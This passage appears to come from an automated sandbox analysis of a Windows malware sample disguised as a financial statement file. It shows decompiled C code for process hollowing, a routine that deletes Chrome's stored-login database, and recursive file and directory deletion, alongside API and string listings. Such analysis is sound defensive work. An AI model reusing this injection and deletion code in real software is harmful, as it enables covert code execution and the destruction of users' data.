                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • open, xrefs: 0040D5BA
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 0040D636
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                        • String ID: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$open
                                        • API String ID: 2294739476-882194827
                                        • Opcode ID: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                        • Opcode Fuzzy Hash: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,69D65DF0), ref: 0041016E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                        • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                          • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                          • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                          • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                        • String ID:
                                        • API String ID: 1196022968-0
                                        • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                        • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                        • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                        • String ID:
                                        • API String ID: 3638635289-0
                                        • Opcode ID: 98380c493d1ed2c942a3f7bfac615572d7a46575fa567749fd01e99bd99cf150
                                        • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                        • Opcode Fuzzy Hash: 98380c493d1ed2c942a3f7bfac615572d7a46575fa567749fd01e99bd99cf150
                                        • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E0040F219() {
                                        				void* _t59;
                                        				void* _t60;
                                        				void _t71;
                                        				void* _t72;
                                        				signed int _t74;
                                        				CONTEXT* _t80;
                                        				intOrPtr _t85;
                                        				intOrPtr* _t93;
                                        				signed int _t95;
                                        				void* _t100;
                                        				CONTEXT* _t110;
                                        				struct _PROCESS_INFORMATION* _t114;
                                        				void* _t115;
                                        				void* _t117;
                                        
                                        				L00413ECA();
                                        				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
                                        				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
                                        				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                        				_t59 =  *(_t115 + 0xc);
                                        				 *(_t115 - 0x74) = _t59;
                                        				if( *_t59 != 0x5a4d) {
                                        					L16:
                                        					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                        					_t60 = 0;
                                        				} else {
                                        					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
                                        					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
                                        					if( *_t93 != 0x4550) {
                                        						goto L16;
                                        					} else {
                                        						_t95 = 0x11;
                                        						memset(_t115 - 0x60, 0, _t95 << 2);
                                        						_t114 =  *(_t115 + 0x10);
                                        						asm("stosd");
                                        						asm("stosd");
                                        						asm("stosd");
                                        						asm("stosd");
                                        						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
                                        							goto L16;
                                        						} else {
                                        							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                        							 *(_t115 - 0x70) = _t110;
                                        							_t110->ContextFlags = 0x10007;
                                        							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
                                        								goto L16;
                                        							} else {
                                        								_t71 =  *(_t115 - 0x1c);
                                        								if(_t71 ==  *(_t93 + 0x34)) {
                                        									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
                                        								}
                                        								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
                                        								 *(_t115 - 0x6c) = _t72;
                                        								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
                                        									goto L16;
                                        								} else {
                                        									_t74 = 0;
                                        									 *(_t115 - 0x64) = 0;
                                        									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
                                        										_t100 =  *(_t115 + 0xc);
                                        										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
                                        										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
                                        										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
                                        										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
                                        										_t74 =  *(_t115 - 0x64);
                                        									}
                                        									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
                                        										goto L16;
                                        									} else {
                                        										_t80 =  *(_t115 - 0x70);
                                        										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
                                        										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
                                        											goto L16;
                                        										} else {
                                        											_t60 = 1;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
                                        				return _t60;
                                        			}

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 0040F21E
                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,73BCF560), ref: 0040F294
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                        • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                        • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                        • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                        • API String ID: 65594003-1050664331
                                        • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                        • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                        • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 32%
                                        			E0040710F() {
                                        				char _v5;
                                        				char _v6;
                                        				char _v24;
                                        				void* _v40;
                                        				char* _t12;
                                        				CHAR* _t13;
                                        				long _t20;
                                        				char* _t21;
                                        				void* _t25;
                                        
                                        				_t12 = getenv("UserProfile");
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                                        				_t13 =  &_v24;
                                        				L00414170();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				if(DeleteFileA(_t13) != 0) {
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                        					E00407A90("\n[Chrome StoredLogins found, cleared!]");
                                        					_t25 = 1;
                                        					L8:
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return _t25;
                                        				}
                                        				_t20 = GetLastError();
                                        				if(_t20 == 0) {
                                        					_t21 =  &_v6;
                                        					L5:
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                        					E00407A90("\n[Chrome StoredLogins not found]");
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return 1;
                                        				}
                                        				if(_t20 == 1) {
                                        					_t21 =  &_v5;
                                        					goto L5;
                                        				}
                                        				_t25 = 0;
                                        				goto L8;
			}

                                        APIs
                                        • getenv.MSVCRT ref: 00407124
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                        • GetLastError.KERNEL32 ref: 0040715F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                        Strings
                                        • UserProfile, xrefs: 0040711F
                                        • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                        • [Chrome StoredLogins not found], xrefs: 00407179
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 3740952235-1062637481
                                        • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                        • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 32%
                                        			E0041203B(char _a4, char _a20) {
                                        				struct _SYSTEMTIME _v20;
                                        				char _v36;
                                        				char _v52;
                                        				char _v68;
                                        				char _v84;
                                        				int _t18;
                                        				char* _t26;
                                        				char* _t27;
                                        				char* _t28;
                                        				char* _t29;
                                        
                                        				if( *0x41bcac != 0) {
                                        					GetLocalTime( &_v20);
                                        					_t3 =  &(_v20.wSecond); // 0x4051ef
                                        					_t26 =  &_v84;
                                        					L00414176();
                                        					_t27 =  &_v68;
                                        					L00414170();
                                        					_t28 =  &_v52;
                                        					L00414140();
                                        					_t29 =  &_v36;
                                        					L00414170();
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                        					_t18 = printf(_t29);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				}
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t18;
			}

                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00412052
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                        • printf.MSVCRT ref: 004120BF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                        • String ID: %02i:%02i:%02i:%03i $Q@
                                        • API String ID: 4249031962-3186260181
                                        • Opcode ID: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                        • Opcode Fuzzy Hash: 383fa367f66b16673637636e30dcf8b22da4594b4546bf8840b2870d857023be
                                        • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00412BEE(wchar_t* _a4) {
                                        				signed char _v5;
                                        				void* _v12;
                                        				short _v532;
                                        				long _v1052;
                                        				struct _WIN32_FIND_DATAW _v1644;
                                        				void* _t46;
                                        
                                        				wcscpy( &_v1052, _a4);
                                        				wcscat( &_v1052, L"\\*");
                                        				wcscpy( &_v532, _a4);
                                        				wcscat( &_v532, "\\");
                                        				_t46 = FindFirstFileW( &_v1052,  &_v1644);
                                        				_v12 = _t46;
                                        				if(_t46 == 0xffffffff) {
                                        					L18:
                                        					return 0;
                                        				}
                                        				wcscpy( &_v1052,  &_v532);
                                        				_v5 = 1;
                                        				do {
                                        					if(FindNextFileW(_v12,  &_v1644) == 0) {
                                        						if(GetLastError() != 0x12) {
                                        							L17:
                                        							FindClose(_v12);
                                        							goto L18;
                                        						}
                                        						_v5 = _v5 & 0x00000000;
                                        						goto L14;
                                        					}
                                        					if(E00412BBA( &(_v1644.cFileName)) != 0) {
                                        						goto L14;
                                        					}
                                        					wcscat( &_v532,  &(_v1644.cFileName));
                                        					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                                        						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                                        							SetFileAttributesW( &_v532, 0x80);
                                        						}
                                        						if(DeleteFileW( &_v532) == 0) {
                                        							goto L17;
                                        						} else {
                                        							L7:
                                        							wcscpy( &_v532,  &_v1052);
                                        							goto L14;
                                        						}
                                        					}
                                        					if(E00412BEE( &_v532) == 0) {
                                        						goto L17;
                                        					}
                                        					RemoveDirectoryW( &_v532);
                                        					goto L7;
                                        					L14:
                                        				} while (_v5 != 0);
                                        				FindClose(_v12);
                                        				return RemoveDirectoryW(_a4);
			}

                                        APIs
                                        • wcscpy.MSVCRT ref: 00412C0A
                                        • wcscat.MSVCRT ref: 00412C1E
                                        • wcscpy.MSVCRT ref: 00412C2A
                                        • wcscat.MSVCRT ref: 00412C38
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                        • wcscpy.MSVCRT ref: 00412C6B
                                        • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                        • wcscat.MSVCRT ref: 00412CB4
                                        • wcscpy.MSVCRT ref: 00412CE9
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                        • DeleteFileW.KERNEL32(?), ref: 00412D11
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                        • GetLastError.KERNEL32 ref: 00412D1D
                                        • FindClose.KERNEL32(004085F5), ref: 00412D39
                                        • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                        • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                          • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                          • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 520940213-0
                                        • Opcode ID: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                        • Instruction ID: fb5d4b3d5d58ecc2c3d6dfc175ce5965a41efe56bc0731aa74bc7a01e785bf8c
